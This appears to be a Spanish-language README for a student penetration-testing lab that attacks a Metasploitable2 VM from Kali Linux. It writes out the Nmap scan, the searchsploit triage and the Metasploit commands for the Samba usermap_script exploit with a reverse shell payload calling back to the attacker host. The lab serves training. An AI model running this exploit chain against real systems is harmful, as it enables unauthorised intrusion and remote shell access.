
Proyecto práctico de pentest utilizando Kali Linux contra Metasploitable2. Incluye el flujo de trabajo completo: escaneo con Nmap, enumeración, explotación con Metasploit (Samba CVE-2007-2447), validación posterior a la explotación y pasos de mitigación. El repositorio contiene comandos, resultados y un informe que muestra tanto técnicas ofensivas como recomendaciones defensivas.
Proyecto de Prácticas 2 — Pruebas de Penetración en Metasploitable2
Resumen: Este proyecto demuestra un flujo de trabajo completo de pruebas de penetración: reconocimiento, enumeración, explotación, validación post-explotación y recomendaciones de mitigación. El objetivo utilizado es Metasploitable2 y la máquina de ataque es Kali Linux.
Herramientas: Kali Linux (atacante) Nmap (reconocimiento) Metasploit Framework (explotación) SearchSploit / Exploit-DB (triaje)
Pasos realizados:
sudo nmap -sS -sV -p- -T4 --open -oA scans/target 192.168.x.x
Servicios identificados (ejemplos): vsftpd 2.3.4 (banner del puerto 21), Samba smbd 3.x (puerto 445).searchsploit --nmap scans/target.xml searchsploit samba 3.0.20
Se relacionaron los servicios con posibles exploits (puerta trasera de vsftpd, username-map de Samba).msfconsole use exploit/multi/samba/usermap_script set RHOSTS 192.168.x.x set payload cmd/unix/reverse set LHOST <kali-ip> set LPORT 4444 exploit
Se obtuvo una shell interactiva y se validó el contexto de usuario.id uname -aResultado Se obtuvo con éxito una shell remota mediante un exploit de Samba, se documentó la ruta de ataque y se elaboró un plan de mitigación. Los registros completos y las salidas de los comandos están almacenados en la carpeta scans/.